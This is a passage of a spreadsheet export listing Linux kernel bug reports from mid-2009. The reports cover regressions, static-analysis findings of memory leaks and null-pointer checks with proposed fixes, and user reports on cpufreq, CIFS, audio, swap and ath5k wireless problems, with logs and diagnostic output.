    <t>Subject : KMS oops on 945G system Submitter : Diego Calleja &lt;diegocg@gmail.com&gt; Date : 2009-07-21 20:50 References : http://marc.info/?l=linux-kernel&amp;m=124820945815030&amp;w=4 Handled-By : Jesse Barnes &lt;jbarnes@virtuousgeek.org&gt; Patch : http://git.kernel.org/?p=linux/kernel/git/anholt/drm-intel.git;a=commit;h=dff33cfcefa31c30b72c57f44586754ea9e8f3e2 This entry is being used for tracking a regression from 2.6.30. Please don't close it until the problem is fixed in the mainline. Caused by: commit 7662c8bd6545c12ac7b2b39e4554c3ba34789c50 Author: Shaohua Li &lt;shaohua.li@intel.com&gt; drm/i915: add FIFO watermark support First-Bad-Commit : 7662c8bd6545c12ac7b2b39e4554c3ba34789c50</t>
  </si>
  <si>
    <t>2.6.31-rc4 boot failure</t>
  </si>
  <si>
    <t>2.6.31-rc4</t>
  </si>
  <si>
    <t>2009-07-26 21:41 UTC</t>
  </si>
  <si>
    <t>2009-07-29 20:59 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.31-rc4 boot failure Submitter : Gene Heskett &lt;gene.heskett@verizon.net&gt; Date : 2009-07-23 14:12 References : http://marc.info/?l=linux-kernel&amp;m=124835839019906&amp;w=4 This entry is being used for tracking a regression from 2.6.29. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Oops when writing to /sys/block/ram0/queue/max_sectors_kb</t>
  </si>
  <si>
    <t>2009-07-26 21:45 UTC</t>
  </si>
  <si>
    <t>2009-08-03 15:29 UTC</t>
  </si>
  <si>
    <t>Subject : Oops when writing to /sys/block/ram0/queue/max_sectors_kb Submitter : Jens Rosenboom &lt;jens@mcbone.net&gt; Date : 2009-07-23 15:30 References : http://marc.info/?l=linux-kernel&amp;m=124836574403032&amp;w=4 This entry is being used for tracking a regression from 2.6.30. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Linux-2.6.31-rc4 fails to open a USB serial port</t>
  </si>
  <si>
    <t>2009-07-26 21:56 UTC</t>
  </si>
  <si>
    <t>2009-08-01 18:56 UTC</t>
  </si>
  <si>
    <t>Subject : [BUG] Linux-2.6.31-rc4 fails to open a USB serial port Submitter : e9hack &lt;e9hack@googlemail.com&gt; Date : 2009-07-25 9:16 References : http://marc.info/?l=linux-kernel&amp;m=124851343512022&amp;w=4 This entry is being used for tracking a regression from 2.6.30. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>inotify regression, missing events</t>
  </si>
  <si>
    <t>2009-07-26 22:15 UTC</t>
  </si>
  <si>
    <t>2009-07-29 21:11 UTC</t>
  </si>
  <si>
    <t>Subject : inotify regression, missing events Submitter : Scott James Remnant &lt;scott@ubuntu.com&gt; Date : 2009-07-11 16:02 References : http://marc.info/?l=linux-kernel&amp;m=124732816314881&amp;w=4 Handled-By : Eric Paris &lt;eparis@redhat.com&gt; This entry is being used for tracking a regression from 2.6.30. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>X stopped accepting keystrokes</t>
  </si>
  <si>
    <t>2009-07-26 22:21 UTC</t>
  </si>
  <si>
    <t>2009-07-27 23:05 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.31-rc2: X stop accepting keystrokes? Submitter : Pavel Machek &lt;pavel@ucw.cz&gt; Date : 2009-07-14 9:24 References : http://marc.info/?l=linux-kernel&amp;m=124756352426737&amp;w=4 Notify-Also : Jiri Kosina &lt;jkosina@suse.cz&gt; Notify-Also : Andreas Mohr &lt;andi@lisas.de&gt; This entry is being used for tracking a regression from 2.6.30. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>found a possible null pointer dereference in file ariadne.c</t>
  </si>
  <si>
    <t>2009-07-27 13:12 UTC</t>
  </si>
  <si>
    <t>2012-06-13 14:25 UTC</t>
  </si>
  <si>
    <t>Hello, i have checked the sources of the linux kernel with the static code analysis tool cppcheck. It found an issue in file linux-2.6.30/drivers/net/ariadne.c at line 424. Take a look at the code: static irqreturn_t ariadne_interrupt(int irq, void *data) { struct net_device *dev = (struct net_device *)data; volatile struct Am79C960 *lance = (struct Am79C960*)dev-&gt;base_addr; struct ariadne_private *priv; int csr0, boguscnt; int handled = 0; if (dev == NULL) { printk(KERN_WARNING "ariadne_interrupt(): irq for unknown device.\n"); return IRQ_NONE; } .... as you can see, the if (dev == NULL) -statement is AFTER the first usage of dev.. Restructuring the code maybe helps here: static irqreturn_t ariadne_interrupt(int irq, void *data) { struct net_device *dev = (struct net_device *)data; if (dev == NULL) { printk(KERN_WARNING "ariadne_interrupt(): irq for unknown device.\n"); return IRQ_NONE; } volatile struct Am79C960 *lance = (struct Am79C960*)dev-&gt;base_addr; struct ariadne_private *priv; int csr0, boguscnt; int handled = 0; .... Best regards Ettl Martin</t>
  </si>
  <si>
    <t>powernow-k8, cpufreq, scaling_max_freq != cpuinfo_max_freq</t>
  </si>
  <si>
    <t>2009-07-28 17:28 UTC</t>
  </si>
  <si>
    <t>pierrearinsal</t>
  </si>
  <si>
    <t>2012-02-02 03:14 UTC</t>
  </si>
  <si>
    <t>Hi. I'm on gentoo. I use powernow-k8 since a long time now... since I switched to 2.6.30, p-k8 works randomly : everything sounds good except some times, I got max frequency = min frequency... here some more details : kernel config : CONFIG_X86_ACPI_CPUFREQ=y CONFIG_X86_POWERNOW_K8=y CONFIG_CPU_FREQ=y CONFIG_CPU_FREQ_TABLE=y CONFIG_CPU_FREQ_DEFAULT_GOV_ONDEMAND=y CONFIG_CPU_FREQ_GOV_PERFORMANCE=y CONFIG_CPU_FREQ_GOV_ONDEMAND=y dmesg | grep powernow : [ 0.721303] powernow-k8: Found 1 AMD Turion(tm) 64 X2 Mobile Technology TL-58 processors (2 cpu cores) (version 2.20.00) [ 0.721549] powernow-k8: 0 : fid 0xb (1900 MHz), vid 0x12 [ 0.721635] powernow-k8: 1 : fid 0xa (1800 MHz), vid 0x13 [ 0.721719] powernow-k8: 2 : fid 0x8 (1600 MHz), vid 0x14 [ 0.721804] powernow-k8: 3 : fid 0x0 (800 MHz), vid 0x1e as you can see, different freqs are correctly detected, but cpufreq-info : cpufrequtils 005: cpufreq-info (C) Dominik Brodowski 2004-2006 Report errors and bugs to cpufreq@vger.kernel.org, please. analyzing CPU 0: driver: powernow-k8 CPUs which need to switch frequency at the same time: 0 1 hardware limits: 800 MHz - 1.90 GHz available frequency steps: 1.90 GHz, 1.80 GHz, 1.60 GHz, 800 MHz available cpufreq governors: ondemand, performance current policy: frequency should be within 800 MHz and 800 MHz. The governor "performance" may decide which speed to use within this range. current CPU frequency is 800 MHz (asserted by call to hardware). analyzing CPU 1: driver: powernow-k8 CPUs which need to switch frequency at the same time: 0 1 hardware limits: 800 MHz - 1.90 GHz available frequency steps: 1.90 GHz, 1.80 GHz, 1.60 GHz, 800 MHz available cpufreq governors: ondemand, performance current policy: frequency should be within 800 MHz and 800 MHz. The governor "performance" may decide which speed to use within this range. current CPU frequency is 800 MHz (asserted by call to hardware). look on "current policy" line for both processors, even if different freqs are detected, governor policy is wrong. for i in /sys/devices/system/cpu/cpu0/cpufreq/*; do echo $i; cat $i; done; /sys/devices/system/cpu/cpu0/cpufreq/affected_cpus 0 1 /sys/devices/system/cpu/cpu0/cpufreq/cpuinfo_cur_freq 800000 /sys/devices/system/cpu/cpu0/cpufreq/cpuinfo_max_freq 1900000 /sys/devices/system/cpu/cpu0/cpufreq/cpuinfo_min_freq 800000 /sys/devices/system/cpu/cpu0/cpufreq/cpuinfo_transition_latency 109000 /sys/devices/system/cpu/cpu0/cpufreq/ondemand cat: /sys/devices/system/cpu/cpu0/cpufreq/ondemand: Is a directory /sys/devices/system/cpu/cpu0/cpufreq/related_cpus 0 1 /sys/devices/system/cpu/cpu0/cpufreq/scaling_available_frequencies 1900000 1800000 1600000 800000 /sys/devices/system/cpu/cpu0/cpufreq/scaling_available_governors ondemand performance /sys/devices/system/cpu/cpu0/cpufreq/scaling_cur_freq 800000 /sys/devices/system/cpu/cpu0/cpufreq/scaling_driver powernow-k8 /sys/devices/system/cpu/cpu0/cpufreq/scaling_governor ondemand /sys/devices/system/cpu/cpu0/cpufreq/scaling_max_freq 800000 &lt;--- here is the pb /sys/devices/system/cpu/cpu0/cpufreq/scaling_min_freq 800000 /sys/devices/system/cpu/cpu0/cpufreq/scaling_setspeed &lt;unsupported&gt; and for i in /sys/devices/system/cpu/cpu0/cpufreq/ondemand/*;do echo $i;cat $i;done; /sys/devices/system/cpu/cpu0/cpufreq/ondemand/ignore_nice_load 0 /sys/devices/system/cpu/cpu0/cpufreq/ondemand/powersave_bias 0 /sys/devices/system/cpu/cpu0/cpufreq/ondemand/sampling_rate 109000 /sys/devices/system/cpu/cpu0/cpufreq/ondemand/sampling_rate_max 54500000 /sys/devices/system/cpu/cpu0/cpufreq/ondemand/sampling_rate_min 54500 /sys/devices/system/cpu/cpu0/cpufreq/ondemand/up_threshold 95 as you can see, /sys/devices/system/cpu/cpu0/cpufreq/scaling_max_freq is the problem. should be 1900000 ls -l /sys/devices/system/cpu/cpu0/cpufreq/scaling_max_freq gives 644 and root:root echo "1900000" &gt; /sys/devices/system/cpu/cpu0/cpufreq/scaling_max_freq gives no error but does nothing cpufreq-set -u 1900000 gives no error but does nothing either. cpufreq-set -g ondemand/performance changes governor, but not scaling_max_freq so to sum up, randomly, sometimes during boot, scaling_max_freq is set wrongly (=scaling_min_freq), and I can't find a way to change it ... I have even try to compile gov_ondemand as a module, and set performance as default. loading cpufreq_ondemand module gives : CPUFREQ: ondemand sampling_rate_max sysfs file is deprecated - used by: cat CPUFREQ: ondemand sampling_rate_min sysfs file is deprecated - used by: cat but no futher progress... I read somewhere that compiling kernel with CONFIG_X86_ACPI_CPUFREQ=y CONFIG_X86_POWERNOW_K8=m helped some folks. I will try it now. the biggest pb is that it happens randomly. let's say once out of 3 boots... pierre</t>
  </si>
  <si>
    <t>CIFS mounts ignore uid argument (ok in 2.6.30.3)</t>
  </si>
  <si>
    <t>2.6.31_2.6.31-020631rc4 from ubuntu mainline PPA</t>
  </si>
  <si>
    <t>2009-07-28 21:39 UTC</t>
  </si>
  <si>
    <t>bugzilla.kernel.org</t>
  </si>
  <si>
    <t>2009-08-09 23:05 UTC</t>
  </si>
  <si>
    <t>Jeff Layton</t>
  </si>
  <si>
    <t>When my 32bit Ubuntu 9.04 client uses 2.6.31rc4 to mount a CIFS share (from a Fedora server) using the 'uid=' option, the specified uid is ignored, and the uid on the server shows up locally instead of the specified one. Rebooting into an earlier kernel (such as 2.6.30.3) the uid= argument is honoured, so this isn't a Samba bug... Example fstab line: //server.house/username /home/username/smb4k/server-username cifs noexec,credentials=/home/username/.cifsPassword,uid=username 0 0 Username is uid 500 remotely, but 1000 local. Correct output from .30: $ ls -lah ~/smb4k/server-username/|head total 235M drwxr-xr-x 72 username 500 0 2009-07-28 22:00 . drwxr-xr-x 6 username username 4.0K 2009-04-07 10:15 .. drwxr-xr-x 2 username 500 0 2005-09-24 15:19 aFile Under .31 something more like: $ ls -lah ~/smb4k/server-username/|head total 235M drwxr-xr-x 72 500 500 0 2009-07-28 22:00 . drwxr-xr-x 6 500 500 4.0K 2009-04-07 10:15 .. drwxr-xr-x 2 500 500 0 2005-09-24 15:19 aFile and obviously I can't write to my remote home directory anymore :-(</t>
  </si>
  <si>
    <t>found a memory leak in linux-2.6.31-rc4/arch/powerpc/sysdev/ipic.c</t>
  </si>
  <si>
    <t>2009-07-29 11:40 UTC</t>
  </si>
  <si>
    <t>2012-06-13 14:28 UTC</t>
  </si>
  <si>
    <t>Hello, i checked the sources of the linux kernel with the static code analysis tool cppcheck. It found a memory leak at file :linux-2.6.31-rc4/arch/powerpc/sysdev/ipic.c at line 739 Take a look at the source: struct ipic * __init ipic_init(struct device_node *node, unsigned int flags) { struct ipic *ipic; struct resource res; u32 temp = 0, ret; ret = of_address_to_resource(node, 0, &amp;res); if (ret) return NULL; ipic = kzalloc(sizeof(*ipic), GFP_KERNEL); if (ipic == NULL) return NULL; ipic-&gt;irqhost = irq_alloc_host(node, IRQ_HOST_MAP_LINEAR, NR_IPIC_INTS, &amp;ipic_host_ops, 0); if (ipic-&gt;irqhost == NULL) 739 return NULL; .... Indeed, the function returns without freeing the memory. A possible solution might be: struct ipic * __init ipic_init(struct device_node *node, unsigned int flags) { struct ipic *ipic; struct resource res; u32 temp = 0, ret; ret = of_address_to_resource(node, 0, &amp;res); if (ret) return NULL; ipic = kzalloc(sizeof(*ipic), GFP_KERNEL); if (ipic == NULL) return NULL; ipic-&gt;irqhost = irq_alloc_host(node, IRQ_HOST_MAP_LINEAR, NR_IPIC_INTS, &amp;ipic_host_ops, 0); if (ipic-&gt;irqhost == NULL) { kfree(ipic); return NULL; } .... Best regards Ettl Martin</t>
  </si>
  <si>
    <t>Can only resume with HP_WMI selected on compaq nc6000 when 4c395bdd3f2ca8f7e8efad881e16071182c3b8ca is reverted</t>
  </si>
  <si>
    <t>2009-07-29 12:47 UTC</t>
  </si>
  <si>
    <t>2009-08-28 23:23 UTC</t>
  </si>
  <si>
    <t>Just for testing I enabled HP_WMI. But from then, I could not resume anymore. I just reverted the last git commit on the 'drivers/platform/x86/hp-wmi.c' code (4c395bdd3f2ca8f7e8efad881e16071182c3b8ca) and now I can resume. The problem still persists on .31-rc serie</t>
  </si>
  <si>
    <t>found a memory leak in file linux-2.6.31-rc4/drivers/net/wireless/iwmc3200wifi/commands.c</t>
  </si>
  <si>
    <t>2009-07-29 13:28 UTC</t>
  </si>
  <si>
    <t>2010-03-02 15:51 UTC</t>
  </si>
  <si>
    <t>Hello, i have checked the sources of the linux kernel with the static code analysis tool cppcheck. It found a memory leak in following file: linux-2.6.31-rc4/drivers/net/wireless/iwmc3200wifi/commands.c at line 223. Take a look at the source: int iwm_store_rxiq_calib_result(struct iwm_priv *iwm) { struct iwm_calib_rxiq *rxiq; u8 *eeprom_rxiq = iwm_eeprom_access(iwm, IWM_EEPROM_CALIB_RXIQ); int grplen = sizeof(struct iwm_calib_rxiq_group); rxiq = kzalloc(sizeof(struct iwm_calib_rxiq), GFP_KERNEL); if (!rxiq) { IWM_ERR(iwm, "Couldn't alloc memory for RX IQ\n"); return -ENOMEM; } eeprom_rxiq = iwm_eeprom_access(iwm, IWM_EEPROM_CALIB_RXIQ); if (IS_ERR(eeprom_rxiq)) { IWM_ERR(iwm, "Couldn't access EEPROM RX IQ entry\n"); 223 return PTR_ERR(eeprom_rxiq); } ... Indeed, the function returns at line 223 without freeing the memory of *eeprom_rxiq. Here is a modifiedsolution: int iwm_store_rxiq_calib_result(struct iwm_priv *iwm) { struct iwm_calib_rxiq *rxiq; u8 *eeprom_rxiq = iwm_eeprom_access(iwm, IWM_EEPROM_CALIB_RXIQ); int grplen = sizeof(struct iwm_calib_rxiq_group); rxiq = kzalloc(sizeof(struct iwm_calib_rxiq), GFP_KERNEL); if (!rxiq) { IWM_ERR(iwm, "Couldn't alloc memory for RX IQ\n"); return -ENOMEM; } eeprom_rxiq = iwm_eeprom_access(iwm, IWM_EEPROM_CALIB_RXIQ); if (IS_ERR(eeprom_rxiq)) { IWM_ERR(iwm, "Couldn't access EEPROM RX IQ entry\n"); kfree(eeprom_rxiq); return PTR_ERR(eeprom_rxiq); } .... Best regards Ettl Martin</t>
  </si>
  <si>
    <t>found a memory leak in linux-2.6.31-rc4/drivers/net/wireless/iwlwifi/iwl-debugfs.c</t>
  </si>
  <si>
    <t>2009-07-29 14:02 UTC</t>
  </si>
  <si>
    <t>2015-11-22 07:31 UTC</t>
  </si>
  <si>
    <t>Hello, i have checked the sources of the linux kernel with the static code analysis tool cppcheck. It found a memory leak in file linux-2.6.31-rc4/drivers/net/wireless/iwlwifi/iwl-debugfs.c at line 321. Lets take a look at the code: static ssize_t iwl_dbgfs_nvm_read(struct file *file, char __user *user_buf, size_t count, loff_t *ppos) { ssize_t ret; struct iwl_priv *priv = (struct iwl_priv *)file-&gt;private_data; int pos = 0, ofs = 0, buf_size = 0; const u8 *ptr; char *buf; size_t eeprom_len = priv-&gt;cfg-&gt;eeprom_size; buf_size = 4 * eeprom_len + 256; if (eeprom_len % 16) { IWL_ERR(priv, "NVM size is not multiple of 16.\n"); return -ENODATA; } /* 4 characters for byte 0xYY */ buf = kzalloc(buf_size, GFP_KERNEL); if (!buf) { IWL_ERR(priv, "Can not allocate Buffer\n"); return -ENOMEM; } ptr = priv-&gt;eeprom; if (!ptr) { IWL_ERR(priv, "Invalid EEPROM/OTP memory\n"); 321 return -ENOMEM; } ... As you can see, the memory allocated in buf is not freed before the return statement. A possible way out might be, using the modified version of the code: static ssize_t iwl_dbgfs_nvm_read(struct file *file, char __user *user_buf, size_t count, loff_t *ppos) { ssize_t ret; struct iwl_priv *priv = (struct iwl_priv *)file-&gt;private_data; int pos = 0, ofs = 0, buf_size = 0; const u8 *ptr; char *buf; size_t eeprom_len = priv-&gt;cfg-&gt;eeprom_size; buf_size = 4 * eeprom_len + 256; if (eeprom_len % 16) { IWL_ERR(priv, "NVM size is not multiple of 16.\n"); return -ENODATA; } /* 4 characters for byte 0xYY */ buf = kzalloc(buf_size, GFP_KERNEL); if (!buf) { IWL_ERR(priv, "Can not allocate Buffer\n"); return -ENOMEM; } ptr = priv-&gt;eeprom; if (!ptr) { IWL_ERR(priv, "Invalid EEPROM/OTP memory\n"); kfree(buf); return -ENOMEM; } ... Best regards Ettl Martin</t>
  </si>
  <si>
    <t>Microphone doesn't work on Toshiba Portege m750</t>
  </si>
  <si>
    <t>2.6.30-gentoo-r1</t>
  </si>
  <si>
    <t>2009-07-29 17:35 UTC</t>
  </si>
  <si>
    <t>pi3mm3</t>
  </si>
  <si>
    <t>2012-06-13 14:29 UTC</t>
  </si>
  <si>
    <t>Created attachment 22526 [details] /proc/asound/Intel/codec#0 Distribution: Gentoo 64bit Hardware Environment: notebook Toshiba Portege M750 Software Environment: desktop with Gnome 2.24.3 and ALSA 1.0.20 Problem Description: internal microphone doesn't work. # lspci -vs 00:1b.0 00:1b.0 Audio device: Intel Corporation 82801I (ICH9 Family) HD Audio Controller (rev 03) Subsystem: Toshiba America Info Systems Device 0001 Flags: bus master, fast devsel, latency 0, IRQ 22 Memory at ff9f8000 (64-bit, non-prefetchable) [size=16K] Capabilities: [50] Power Management version 2 Capabilities: [60] Message Signalled Interrupts: Mask- 64bit+ Count=1/1 Enable- Capabilities: [70] Express Root Complex Integrated Endpoint, MSI 00 Capabilities: [100] Virtual Channel &lt;?&gt; Capabilities: [130] Root Complex Link &lt;?&gt; Kernel driver in use: HDA Intel Kernel modules: snd-hda-intel # cat /proc/asound/Intel/codec#0 | grep Codec Codec: Realtek ALC268</t>
  </si>
  <si>
    <t>cpufreq bug (null pointer dereference)</t>
  </si>
  <si>
    <t>2009-07-29 21:53 UTC</t>
  </si>
  <si>
    <t>2009-08-05 11:40 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.31-rc3 cpufreq bug (null pointer dereference) Submitter : Christophe Lermytte &lt;christophe.lermytte@thomson.net&gt; Date : 2009-07-21 22:07 References : http://marc.info/?l=linux-kernel&amp;m=124820689011112&amp;w=4 Handled-By : "Pallipadi, Venkatesh" &lt;venkatesh.pallipadi@intel.com&gt; Patch : http://patchwork.kernel.org/patch/38229/ This entry is being used for tracking a regression from 2.6.30. Please don't close it until the problem is fixed in the mainline. Caused by: commit ee88415caf736b89500f16e0a545614541a45005 Author: venkatesh.pallipadi@intel.com &lt;venkatesh.pallipadi@intel.com&gt; Date: Thu Jul 2 17:08:33 2009 -0700 [CPUFREQ] Cleanup locking in conservative governor Signed-off-by: Venkatesh Pallipadi &lt;venkatesh.pallipadi@intel.com&gt; Signed-off-by: Dave Jones &lt;davej@redhat.com&gt; First-Bad-Commit : ee88415caf736b89500f16e0a545614541a45005</t>
  </si>
  <si>
    <t>x86 CPA incorrect memtype reserving using set_pages_array_xx</t>
  </si>
  <si>
    <t>2.6.31 rc series</t>
  </si>
  <si>
    <t>2009-07-31 13:39 UTC</t>
  </si>
  <si>
    <t>2009-08-05 11:41 UTC</t>
  </si>
  <si>
    <t>Created attachment 22552 [details] Patch to fix cpa memtype set_pages_array_xx reserving With the set_pages_array_xx() interface, the page virtual address is used to reserve memtype ranges instead of the page physical address. This causes incorrect ranges to be reserved with various symptoms, in particular false errors. Furthermore, highmem pages were not handled correctly. CPA should ignore them. One can argue that it is an error to call set_pages_array_xx() with highmem pages, but usually the page arrays that are used as arguments to this interface contain a mix of highmem and lowmem pages. Patch that seems to fix the problem attached.</t>
  </si>
  <si>
    <t>When using a crypted partition as swap on ARM linux page alocator keeps failing</t>
  </si>
  <si>
    <t>2009-08-02 13:16 UTC</t>
  </si>
  <si>
    <t>2012-06-13 14:33 UTC</t>
  </si>
  <si>
    <t>I really dont know if this is a bug in kernel , but everytime i try to use an encrypted swap partition i get this error when kernel tries to swap. Adding 506008k swap on /dev/mapper/cswap. Priority:-1 extents:1 across:506008k swapper: page allocation failure. order:1, mode:0x20 [&lt;c002d9b4&gt;] (unwind_backtrace+0x0/0xe4) from [&lt;c02a33ac&gt;] (dump_stack+0x18/0x1c) [&lt;c02a33ac&gt;] (dump_stack+0x18/0x1c) from [&lt;c007cb5c&gt;] (__alloc_pages_internal+0x34c/0x428) [&lt;c007cb5c&gt;] (__alloc_pages_internal+0x34c/0x428) from [&lt;c009f468&gt;] (cache_alloc_refill+0x398/0x670) [&lt;c009f468&gt;] (cache_alloc_refill+0x398/0x670) from [&lt;c009f890&gt;] (kmem_cache_alloc+0x78/0x90) [&lt;c009f890&gt;] (kmem_cache_alloc+0x78/0x90) from [&lt;c0222ae8&gt;] (sk_prot_alloc+0x28/0xf4) [&lt;c0222ae8&gt;] (sk_prot_alloc+0x28/0xf4) from [&lt;c0222f8c&gt;] (sk_clone+0x20/0x1f0) [&lt;c0222f8c&gt;] (sk_clone+0x20/0x1f0) from [&lt;c025a42c&gt;] (inet_csk_clone+0x18/0x8c) [&lt;c025a42c&gt;] (inet_csk_clone+0x18/0x8c) from [&lt;c0270430&gt;] (tcp_create_openreq_child+0x1c/0x320) [&lt;c0270430&gt;] (tcp_create_openreq_child+0x1c/0x320) from [&lt;c026ef4c&gt;] (tcp_v4_syn_recv_sock+0x48/0x194) [&lt;c026ef4c&gt;] (tcp_v4_syn_recv_sock+0x48/0x194) from [&lt;c02701ac&gt;] (tcp_check_req+0x1d8/0x440) [&lt;c02701ac&gt;] (tcp_check_req+0x1d8/0x440) from [&lt;c026e64c&gt;] (tcp_v4_do_rcv+0x114/0x1f4) [&lt;c026e64c&gt;] (tcp_v4_do_rcv+0x114/0x1f4) from [&lt;c026ee40&gt;] (tcp_v4_rcv+0x714/0x7d8) [&lt;c026ee40&gt;] (tcp_v4_rcv+0x714/0x7d8) from [&lt;c0250460&gt;] (ip_local_deliver_finish+0x128/0x24c) [&lt;c0250460&gt;] (ip_local_deliver_finish+0x128/0x24c) from [&lt;c0250634&gt;] (ip_local_deliver+0xb0/0xbc) [&lt;c0250634&gt;] (ip_local_deliver+0xb0/0xbc) from [&lt;c024fef8&gt;] (ip_rcv_finish+0x1f0/0x38c) [&lt;c024fef8&gt;] (ip_rcv_finish+0x1f0/0x38c) from [&lt;c02502cc&gt;] (ip_rcv+0x238/0x2a4) [&lt;c02502cc&gt;] (ip_rcv+0x238/0x2a4) from [&lt;c022f080&gt;] (netif_receive_skb+0x3d0/0x494) [&lt;c022f080&gt;] (netif_receive_skb+0x3d0/0x494) from [&lt;c01e5cb0&gt;] (mv643xx_eth_poll+0x53c/0x7d8) [&lt;c01e5cb0&gt;] (mv643xx_eth_poll+0x53c/0x7d8) from [&lt;c022d460&gt;] (net_rx_action+0x174/0x244) [&lt;c022d460&gt;] (net_rx_action+0x174/0x244) from [&lt;c0048b30&gt;] (__do_softirq+0x7c/0x10c) [&lt;c0048b30&gt;] (__do_softirq+0x7c/0x10c) from [&lt;c0048c20&gt;] (irq_exit+0x60/0x68) [&lt;c0048c20&gt;] (irq_exit+0x60/0x68) from [&lt;c002604c&gt;] (_text+0x4c/0x74) [&lt;c002604c&gt;] (_text+0x4c/0x74) from [&lt;c0026ae8&gt;] (__irq_svc+0x48/0x94) Exception stack(0xc03b9f40 to 0xc03b9f88) 9f40: 00000000 c18d8fa0 00000000 60000013 c0028578 c03b8000 c03bc88c c0028578 9f60: c03da328 41069260 000207d4 c03b9fac c03b9f88 c03b9f88 c00285cc c0028534 9f80: 60000013 ffffffff [&lt;c0026ae8&gt;] (__irq_svc+0x48/0x94) from [&lt;c00285cc&gt;] (default_idle+0x54/0x68) [&lt;c00285cc&gt;] (default_idle+0x54/0x68) from [&lt;c029ec4c&gt;] (rest_init+0x78/0x8c) [&lt;c029ec4c&gt;] (rest_init+0x78/0x8c) from [&lt;c00089ac&gt;] (start_kernel+0x23c/0x2d8) [&lt;c00089ac&gt;] (start_kernel+0x23c/0x2d8) from [&lt;00008034&gt;] (0x8034) Mem-info: Normal per-cpu: CPU 0: hi: 42, btch: 7 usd: 23 Active_anon:2620 active_file:1520 inactive_anon:2694 inactive_file:17762 unevictable:0 dirty:493 writeback:0 unstable:0 free:477 slab:1639 mapped:4118 pagetables:160 bounce:0 Normal free:1908kB min:1440kB low:1800kB high:2160kB active_anon:10480kB inactive_anon:10776kB active_file:6080kB inactive_file:71048kB unevictable:0kB present:130048kB pages_scanned:0 all_unreclaimable? no lowmem_reserve[]: 0 0 Normal: 431*4kB 7*8kB 2*16kB 1*32kB 1*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 1908kB 20166 total pagecache pages 809 pages in swap cache Swap cache stats: add 98977, delete 98168, find 56705/77796 Free swap = 501820kB Total swap = 506008kB 32768 pages of RAM 661 free pages 1343 reserved pages 1639 slab pages 10694 pages shared 809 pages swap cached I think it is related to the ARM architecture, cause i use the same configuration in different architectures with no problems.</t>
  </si>
  <si>
    <t>PCI resources allocation problem on HP nx6325</t>
  </si>
  <si>
    <t>2009-08-02 13:37 UTC</t>
  </si>
  <si>
    <t>2009-08-03 20:42 UTC</t>
  </si>
  <si>
    <t>There is a PCI resources allocation problem on HP nx6325 introduced by the following commit: commit a76117dfd687ec4be0a9a05214f3009cc5f73a42 Author: Matthew Wilcox &lt;willy@linux.intel.com&gt; Date: Wed Jun 17 16:33:35 2009 -0400 x86: Use pci_claim_resource Instead of open-coding pci_find_parent_resource and request_resource, just call pci_claim_resource. Signed-off-by: Matthew Wilcox &lt;willy@linux.intel.com&gt; Signed-off-by: Linus Torvalds &lt;torvalds@linux-foundation.org&gt; As a result, the audio adapter doesn't work on the affected system.</t>
  </si>
  <si>
    <t>ath5k with 168c:001c in Aspire ONE causes other nearby wireless clients to disassociate</t>
  </si>
  <si>
    <t>2009-08-02 14:33 UTC</t>
  </si>
  <si>
    <t>Andras Korn</t>
  </si>
  <si>
    <t>2010-08-18 18:58 UTC</t>
  </si>
  <si>
    <t>Hi, I have described this as a follow-up to #10605 already, because it looked related, but maybe nobody saw because that bug had already been marked as closed. I have a Lenovo Thinkpad with iwlagn that normally doesn't have any wifi connection issues. Additionally, I have an Acer Aspire ONE netbook with an "Atheros Communications Inc. AR5001" (168c:001c) adapter; plus I have a USB stick with an RT73 chip. When I use the Atheros adapter of the netbook, it disconnects sporadically from my AP (an old low-end Micronet device, set to WPA-PSK). If I use the rt73usb stick, things are fine. So far, this looks like #10605 (although I still see it with 2.6.31-rc4). The part where it gets really strange is that when using the Atheros adapter, the Thinkpad with the iwlagn adapter is also disconnected whenever the Atheros is disconnected, and the kernel messages are roughly the same. This leads me to believe that the Atheros card sends something that confuses the AP so thoroughly that it disassociates all clients. Or something like that. Here is a somewhat collated kernel log of the two (gehenna is the Thinkpad with awlagn, cherub is the Aspire One with ath5k): Jul 25 12:50:02 cherub kernel: [ 789.872172] wlan0: deauthenticated (Reason: 14) Jul 25 12:50:03 cherub kernel: [ 790.872229] wlan0: direct probe to AP 00:0d:88:c9:04:7f try 1 Jul 25 12:50:03 cherub kernel: [ 790.877046] wlan0 direct probe responded Jul 25 12:50:03 cherub kernel: [ 790.877066] wlan0: authenticate with AP 00:0d:88:c9:04:7f Jul 25 12:50:03 cherub kernel: [ 790.878647] wlan0: authenticated Jul 25 12:50:03 cherub kernel: [ 790.878666] wlan0: associate with AP 00:0d:88:c9:04:7f Jul 25 12:50:03 cherub kernel: [ 790.882951] wlan0: RX ReassocResp from 00:0d:88:c9:04:7f (capab=0x431 status=12 aid=0) Jul 25 12:50:03 cherub kernel: [ 790.882974] wlan0: AP denied association (code=12) Jul 25 12:50:03 cherub kernel: [ 791.076089] wlan0: associate with AP 00:0d:88:c9:04:7f Jul 25 12:50:03 cherub kernel: [ 791.078269] wlan0: RX AssocResp from 00:0d:88:c9:04:7f (capab=0x431 status=12 aid=0) Jul 25 12:50:03 cherub kernel: [ 791.078280] wlan0: AP denied association (code=12) Jul 25 12:50:03 cherub kernel: [ 791.276089] wlan0: associate with AP 00:0d:88:c9:04:7f Jul 25 12:50:03 cherub kernel: [ 791.278304] wlan0: RX AssocResp from 00:0d:88:c9:04:7f (capab=0x431 status=12 aid=0) Jul 25 12:50:03 cherub kernel: [ 791.278317] wlan0: AP denied association (code=12) Jul 25 12:50:03 cherub kernel: [ 791.476142] wlan0: association with AP 00:0d:88:c9:04:7f timed out Jul 25 12:50:03 gehenna kernel: [172503.744312] wlan0: deauthenticated Jul 25 12:50:03 gehenna kernel: [172503.862001] wlan0: authenticate with AP 00:0d:88:c9:04:7f Jul 25 12:50:03 gehenna kernel: [172503.862001] wlan0: authenticate with AP 00:0d:88:c9:04:7f Jul 25 12:50:03 gehenna kernel: [172503.865172] wlan0: authenticated Jul 25 12:50:03 gehenna kernel: [172503.865172] 